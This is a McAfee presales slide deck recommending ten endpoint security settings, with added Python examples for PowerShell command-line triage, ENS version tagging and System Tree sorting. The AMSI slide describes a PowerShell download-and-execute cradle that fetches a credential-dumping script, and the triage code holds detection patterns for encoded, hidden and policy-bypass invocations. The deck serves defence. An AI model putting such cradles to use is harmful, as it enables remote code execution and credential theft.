-
McAfee CONFIDENTIAL
McAfee 's Top 10 endpoint optimization recommendations
Robert Lourenco – Regional presales specialist
-
Please note
While there are many variations of settings and configurations that will best suit different customers, this document is intended to help customers with frequently seen missing or misconfigured protection controls. It assumes that, at the very least, OAS is enabled, tamper protection and UI passwords are enabled, and ENS is deployed.
This document is drawn from experience with health checks at many customers and therefore does not include every possible recommended setting. For a thorough investigation or check of your environment against best practice or recommendations, please engage McAfee Professional Services.
-
AGENDA
• Addressing work from home endpoints
• ENS optimizations and configurations for better visibility or protection
• ePO optimizations
Many customers running McAfee ePO and Endpoint Security have not made a few optimizations that would lead to a more secure environment with more visibility.
-
Our customers' value drivers
[Slide graphic. Three value drivers: Transformation; Risk and Resiliency; Automation and efficacy. The talk's topics are placed against them: Work from home; Increased visibility and control; New ENS 10.7 features (Fileless detection & AMSI, Story Graph); Rollback remediation; ePO automations; ENS/TIE/ATD integrations and automation; new models (SaaS/IaaS/PaaS).
Business goals listed on the graphic: transition legacy datacenters to a multi-cloud model for cost savings and agility; support legacy infrastructure and application services as necessary; support agile DevOps and redesign critical business applications for the cloud; adopt Industrial IoT and leverage data analytics for more business insights; transition legacy IT infrastructure supporting OT to the multi-cloud enterprise infrastructure; enable flexibility in sharing and application use for maximum productivity; transition office services and common business applications to the cloud; support a global, mobile workforce that enables productivity from the office to the home to the hotel; increase productivity and innovation; attract and retain talent; increase sales and improve customer engagement.]
-
Transformation: Organizations are transforming with technology. Whether adopting the cloud, BYOD or IoT to transform the way they engage with customers, partners and/or employees, organizations bear risk as these technologies expand the attack surface. With McAfee, organizations can transform confidently, leveraging security solutions purpose-built with transformation in mind, including those that secure every segment of the cloud and heterogeneous device environments. And we transform the nature of security itself with security-as-a-service consumption models.
-
Optimization 1: Addressing the work from home conundrum: Endpoint visibility
-
Work from Home: Placing agent handlers in the DMZ
Benefits:
• Updated roaming users' policies and software
• Get roaming users' threat and client events
Positive results
• No VPN requirement
• WFH visibility
-
Baseline McAfee ePO infrastructure with DMZ agent handler
[Slide diagram. Components: McAfee ePO server with SQL, ePO console, and an agent handler on the DMZ servers; laptops on the Internet. Flows and ports shown:]
• ePO server ↔ SQL: port 1433 (SSL)
• DMZ agent handler ↔ ePO server: ports 443, 8443, 8444
• Pull software & updates: TCP port 21/80 and 443
• Laptops (MA 5.x) → DMZ agent handler: port 443 (events upstream; policies and client tasks down); pull software & updates on port 443
KEY POINTS
▪ Simple deployment
▪ Ease of management from a single console
▪ Ease of scalability
▪ Distributed definition updates
▪ Remote user support
-
Optimization 2 (TIE customers only): Addressing the work from home conundrum: Remote TIE reputation capabilities
-
Work from Home: Placing DXL brokers in the DMZ (TIE customers)
Benefits:
• Run agent wake up calls to roaming users
• Apply DXL messages to roaming users
• Provide enterprise reputation protection from Threat intelligence exchange to roaming users
Positive results
• No VPN requirement
• WFH endpoint increased protection
-
Baseline McAfee® ePO™ infrastructure with DMZ DXL broker
[Slide diagram. Components: McAfee ePO server with SQL, McAfee ATD, McAfee TIE primary DXL broker, ePO console; an agent handler and a DXL broker on the DMZ servers; laptops on the Internet. Flows and ports shown:]
• ePO server ↔ SQL: port 1433 (SSL)
• DMZ agent handler ↔ ePO server: ports 443, 8443, 8444
• DMZ DXL broker ↔ TIE primary DXL broker: DXL port 8883
• MA port 8081; AH port 443
• Pull software & updates: TCP port 21/80 and 443
• Laptops (MA 5.x) → DMZ: DXL port 8883 + ICMP; events upstream, policies and client tasks down on port 443; pull software & updates on port 443; DXL port 8883 + 443
KEY POINTS
▪ Simple deployment
▪ Ease of management from a single console
▪ Ease of scalability
▪ Distributed definition updates
▪ Remote user support
-
Risk and Resiliency: Security is about risk management. To fulfill this purpose, security professionals must speak the language of the boardroom. Yesterday's security tools leave them blind to the risk, let alone able to communicate it. And, with regulations (like GDPR) upping the ante on the consequences of a breach, the stakes are getting higher. McAfee provides security solutions that offer visibility and control of data and assets across the attack surface, enabling organizations to meet compliance requirements, protect intellectual property and manage financial and reputational risk.
-
ENS 10.7
-
For customers who still have not upgraded to ENS 10.7:
• Best performing ENS to date with all the additional features
• Most stable ENS release to date
• Multiple new enhancements
-
ENS | Detection Technology per Version
Endpoint Security Capabilities Summary

| Detection Technology | ENS 10.5.5 | ENS 10.5.5 | ENS 10.6.1 | ENS 10.7 |
|---|---|---|---|---|
| Threat Prevention | Yes | Yes | Yes | Yes |
| Adaptive Threat Prevention | - | Yes | Yes | Yes |
| Signature & Heuristic Engine (convicting the majority of known malware) | Yes | Yes | Yes | Yes |
| Global Threat Intelligence (cloud-based reputation for some known malware detections & up-to-the-minute updates) | Yes | Yes | Yes | Yes |
| Attack Surface Reduction (using Exploit Prevention rules) | Yes | Yes | Yes | Yes |
| Threat Intelligence Exchange (internal reputation source with unknown files automatically sent to ATD sandbox for analysis) | - | Yes | Yes | Yes |
| Process Containment (Dynamic Application Containment) | - | Yes | Yes | Yes |
| Static and Dynamic machine learning (using Real Protect) | - | Yes | Yes | Yes |
| File-based and fileless script attack signature detection (using Microsoft Anti-Malware Scan Interface, AMSI) | - | - | Yes | Yes |
| Attack Behavior Blocking (using Adaptive Threat Prevention rules with Process Tree Knowledge) | - | - | - | Yes |
| File-based and fileless script attack machine learning detection (using AMSI on Windows 10 and Windows 7 with PowerShell 5.0) | - | - | - | Yes |
| Roll-back of file and registry changes including encrypted files (using Enhanced Remediation) | - | - | - | Yes |
| Story Graph to illustrate the flow and activities associated with an attack (from launch to conviction) | - | - | - | Yes |
-
Optimization 3: ENS AMSI
-
Have you enabled AMSI (Antimalware Scan Interface)?
McAfee's AMSI integration protects against malicious scripts. VBScript and PowerShell scripts can be obfuscated; with AMSI support, ENS scans the de-obfuscated script content, so that obfuscated and fileless malware cannot run undetected on the system.
This setting may not be enabled by default, or may be set to observe mode only, which creates events but does not block malicious scripts from running.
This setting can be found in the ENS ATP Options policy under Real Protect scanning:
-
[Slide graphic: a PowerShell download-and-execute one-liner (IEX (New-Object System.Net.WebClient).DownloadString(...) fetching a credential-dumping script) and an encoded invocation (POWERSHELL.EXE -ENCODEDCOMMAND ...) passing from CMD into the scripting engine. With AMSI support, McAfee Fileless Threat Protection inspects the script at the scripting engine, after de-obfuscation.]
-
Optimization 4: ENS Exploit Prevention – PowerShell signatures
-
Do you have PowerShell visibility or protection?
McAfee ENS Exploit Prevention contains signatures for PowerShell monitoring and control.
These signatures may not be enabled by default. At a minimum, for visibility for endpoint and SOC teams, enable the important ones for reporting if not for blocking. Visibility of encoded commands, hidden windows, execution policy bypass and many others is important for monitoring and detecting malware or malicious use of systems.
This setting can be found in the ENS Exploit Prevention policy under Signatures.
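As an added example (not code from the deck), the following Python triage routine gives the kind of visibility Optimizations 3 and 4 ask for: it recognises PowerShell invocations in process command lines, decodes the base64/UTF-16LE payload of -EncodedCommand so the real script is visible, and flags the encoded, hidden-window, policy-bypass and download-and-run indicators the slide lists. The command lines are constructed samples with a benign payload.

```python
import base64
import re

# Constructed sample command lines (not from the original deck); the encoded payload is benign.
SAMPLE_SCRIPT = "Write-Output 'hello from an encoded command'"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_LINES = [
    f"POWERSHELL.EXE -NoP -W Hidden -EncodedCommand {SAMPLE_ENCODED}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "notepad.exe C:\\notes.txt",
]

# Indicators the deck calls out for PowerShell visibility (encoded, hidden, policy bypass)
# plus the download-and-run cradle shown on the AMSI slide.
INDICATORS = {
    "encoded": re.compile(r"-e(nc(odedcommand)?)?\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|\biex\b|invoke-expression", re.I),
}
POWERSHELL = re.compile(r"powershell(\.exe)?\b|pwsh(\.exe)?\b", re.I)

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if the line has none.
    PowerShell accepts any unambiguous prefix of the switch (-e, -enc, ...) and the
    argument is base64 of UTF-16LE text, which is why plain string matching misses it."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if INDICATORS["encoded"].fullmatch(tok):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def triage(cmdline):
    """Classify one process command line: is it PowerShell, which indicators match
    (checked on the raw line and on the decoded script), and the decoded script."""
    if not POWERSHELL.search(cmdline):
        return {"powershell": False, "indicators": [], "decoded": None}
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"powershell": True, "indicators": hits, "decoded": decoded}

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(triage(line))
```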
-
Optimization 5: ENS Exploit Prevention – Fileless signatures
-
Are Fileless signatures enabled?
McAfee ENS Exploit Prevention contains signatures for fileless threat monitoring and control.
These signatures may not be enabled by default. At a minimum, for visibility for endpoint and SOC teams, enable the important ones for reporting if not for blocking. Visibility of fileless threats is important for monitoring and detecting malware or malicious use of systems.
This setting can be found in the ENS Exploit Prevention policy under Signatures.
-
Optimization 6: ENS Exploit Prevention – Network intrusion prevention
-
Can you see port scanning and other network intrusions between endpoints that do not traverse network devices such as an IPS or firewalls?
This setting may not be enabled by default. ENS can detect network port scans and other network intrusions with its network intrusion prevention capability.
This setting can be found in the ENS Exploit Prevention policy under Network Intrusion Prevention.
-
Optimization 7: ENS – Ensure GTI is enabled
-
Is GTI enabled?
• Make sure GTI is enabled and that the systems can reach GTI through DNS. If the customer has a split DNS architecture, changes are needed before ENS Threat Prevention can benefit from GTI; see:
• https://kc.mcafee.com/corporate/index?page=content&id=KB53782
-
Automation & Efficacy: Security is awash in complexity. Sophisticated attacks are increasing, the vendor landscape is too complex, too many security products operate in isolation and there are too few employees to address the challenge. McAfee addresses the need by giving customers the best of both worlds: an open approach that offers competitive choice while simplifying operations; a mix of threat and artificial intelligence to maximize efficacy and minimize false positives; and solutions that team humans with machines to address both the sophistication and volume of threats.
-
Optimization 8: Effective client tasks
-
A client deployment task should be created at the top level of the System Tree and deployed to all systems that require protection.
A task set to run immediately should be created so that, as soon as a system has a McAfee Agent deployed to it, it deploys ENS and the ENS components automatically. This reduces the time systems are unprotected.
A daily task should also be set up so that any systems that did not complete the immediate task for any reason are caught by the daily task.
-
Product Deployment & Maintenance
Situation
• When managing large numbers of systems within a complex environment, some of these systems will inevitably not be running the desired products and versions of software
Desired Outcome
• To maximise the numbers of systems running the desired products and versions of software
-
Product Deployment & Maintenance
The objective is to ensure Endpoint Security is installed and up to date from a product perspective, i.e.
• An endpoint is running the latest versions of each Endpoint Security module
• It is not concerned with content (Engine or DAT installed)
Detailed Objectives
1. Identify systems that are out of compliance
2. Configure easy identification of non-compliant systems within System Tree
3. Configure shorter reporting interval (ASCI) for non-compliant systems
4. For systems that do not have any version installed run a deployment task
5. For systems that have an out of date version run an update task
6. Remove identification and shorter reporting interval for compliant systems
Objectives & workflow
-
Use of tags with product deployment and maintenance
• Tags
  • NO ENS: one or more ENS modules is not installed
  • BAD ENS: one or more ENS modules is out of date
  • Only one of the two, or neither, should be applied at any one time
  Note the use of simple, short names; these can easily be viewed in the System Tree.
  Remember that other tags may be present if automation is used extensively.
• How to assign tags? Some considerations:
  • Tag assignment should be automatic (the admin should not need to assign tags)
  • Tag removal should be automatic too (i.e. a tag is only present while its condition is true)
  • ENS consists of multiple modules, so multiple version checks are required (e.g. Platform, Threat Prevention, Firewall, Web Control, Adaptive Threat Prevention)
  • The process should be as simple as possible to maintain (e.g. when a new version of ENS is released and the version numbers of all modules need to change)
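The tag logic described above, as an added Python example (not the deck's own automation): per-module version checks across the five ENS modules listed, the rule that NO ENS and BAD ENS are never applied together, automatic removal once the condition no longer holds, and the mapping to the deploy/update task and shorter ASCI from the workflow. The baseline version strings are placeholders.

```python
# Constructed example (not from the deck): derive the NO ENS / BAD ENS tags for an endpoint
# from the ENS modules listed on the slide. Baseline version strings are placeholders.
REQUIRED_MODULES = {
    "Platform": "10.7.0.1000",
    "Threat Prevention": "10.7.0.1000",
    "Firewall": "10.7.0.1000",
    "Web Control": "10.7.0.1000",
    "Adaptive Threat Prevention": "10.7.0.1000",
}
MANAGED_TAGS = {"NO ENS", "BAD ENS"}

def parse_version(text):
    """'10.7.0.1000' -> (10, 7, 0, 1000); shorter strings are padded so tuples compare sanely."""
    parts = [int(p) for p in text.split(".")]
    return tuple(parts + [0] * (4 - len(parts)))

def evaluate_tags(installed, required=REQUIRED_MODULES):
    """Return the managed tags an endpoint should carry: {'NO ENS'}, {'BAD ENS'} or empty.
    A missing module takes precedence over an outdated one so the system gets a deployment
    task rather than an update task; the two tags are never applied together."""
    if any(module not in installed for module in required):
        return {"NO ENS"}
    if any(parse_version(installed[m]) < parse_version(v) for m, v in required.items()):
        return {"BAD ENS"}
    return set()

def reconcile(current_tags, installed, required=REQUIRED_MODULES):
    """(tags to add, tags to remove) so a managed tag is present only while its condition
    holds. Tags outside MANAGED_TAGS (site, role, other automations) are left untouched."""
    wanted = evaluate_tags(installed, required)
    current = set(current_tags)
    return wanted - current, (current & MANAGED_TAGS) - wanted

def plan(tags):
    """Map the managed tags to the workflow: which client task to run and whether the
    shorter agent-to-server communication interval (ASCI) should apply."""
    if "NO ENS" in tags:
        return {"task": "deploy ENS", "short_asci": True}
    if "BAD ENS" in tags:
        return {"task": "update ENS", "short_asci": True}
    return {"task": None, "short_asci": False}
```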
-
Optimization 9: System tree sorting
-
System tree sorting
Situation
• When managing large numbers of systems within a complex environment, systems need to move automatically into the correct groups so that they have the right policies applied for the type of system they are or the location they are connecting from.
Desired Outcome
• To ensure systems are always placed in the correct group to get the correct policies.
-
System tree sorting - configuration
First check the server settings
• Under Configuration → Server Settings → System Tree Sorting, ensure sorting is enabled so that systems are sorted on each agent-to-server communication.
Check whether the systems themselves have sorting enabled in the System Tree
• You may need to add the System Tree Sorting column to see this
-
System tree sorting - configuration
Check whether sorting is enabled on the Active Directory synchronization agent deployment
• Under System Tree → Group Details → Synchronization Type → Push Agent
Ensure sorting criteria are set up by IP or tag. Systems will move to the correct groups based on IP, tag, or a combination of the two.
• Under System Tree → Group Details → Sorting Criteria
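As an added Python model of the sorting criteria just described (not ePO's own implementation), each group carries optional IP-subnet and tag criteria, a group matches only when every criterion it defines is satisfied (so a group with both is the "combination of the two"), and a system lands in the first matching group or falls through to Lost and Found. It also flags the ordering mistake in which a broader group would capture systems before a narrower one with the same tag is evaluated. Group names, subnets and tags are placeholders.

```python
import ipaddress

# Constructed example (not from the deck): System Tree groups in evaluation order, each with
# optional IP-subnet and tag sorting criteria. Names, subnets and tags are placeholders.
GROUPS = [
    {"name": "Servers/DMZ", "subnets": ["192.0.2.0/24"], "tags": ["Server"]},  # IP AND tag
    {"name": "Servers", "subnets": [], "tags": ["Server"]},                     # tag only
    {"name": "Workstations/HQ", "subnets": ["10.10.0.0/16"], "tags": []},       # IP only
    {"name": "Workstations/Roaming", "subnets": [], "tags": ["Roaming"]},
]

def matches(group, ip, tags):
    """True when every criterion the group defines is satisfied: the IP falls in one of its
    subnets (if any are listed) and the system carries one of its tags (if any are listed).
    A group with no criteria never matches, so nothing lands there by accident."""
    subnets, wanted_tags = group["subnets"], set(group["tags"])
    if not subnets and not wanted_tags:
        return False
    addr = ipaddress.ip_address(ip)
    if subnets and not any(addr in ipaddress.ip_network(s) for s in subnets):
        return False
    if wanted_tags and not (wanted_tags & set(tags)):
        return False
    return True

def sort_system(ip, tags, groups=GROUPS, fallback="Lost and Found"):
    """Group a system sorts into on its next agent-to-server communication: the first
    matching group in order, otherwise the fallback group."""
    for group in groups:
        if matches(group, ip, tags):
            return group["name"]
    return fallback

def audit_order(groups=GROUPS):
    """Flag pairs where a tag-only group precedes a group with the same tags plus subnets:
    the broader group would capture the systems the narrower one was meant to receive."""
    problems = []
    for i, broad in enumerate(groups):
        for narrow in groups[i + 1:]:
            same_tags = set(broad["tags"]) == set(narrow["tags"])
            if same_tags and not broad["subnets"] and narrow["subnets"]:
                problems.append((broad["name"], narrow["name"]))
    return problems
```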
-
Optimization 10: ENS 10.7 – roll back
-
Rollback Remediation
How it works: automatically returns systems to a healthy state
Malware attempts to compromise an endpoint:
• Filenames are altered
• Executables are called on to grant access to the system
• Payload is delivered, system is compromised
ENS records the changes:
• A system snapshot is established
• Changes made to files, permission changes and other malicious actions are recorded
ENS detects and remediates:
• ENS detects threats through known methods, behavioral analysis or global threat intelligence
• Rollback remediation is triggered by administrative policies
• System changes are reversed and the system returns to a healthy state
Users remain productive; administrators regain the time otherwise spent on manual repair or reimaging.
-
ENS 10.7 ATP – Enable enhanced remediation
To enable roll back:
• Under the ENS ATP policies → Options → Action Enforcement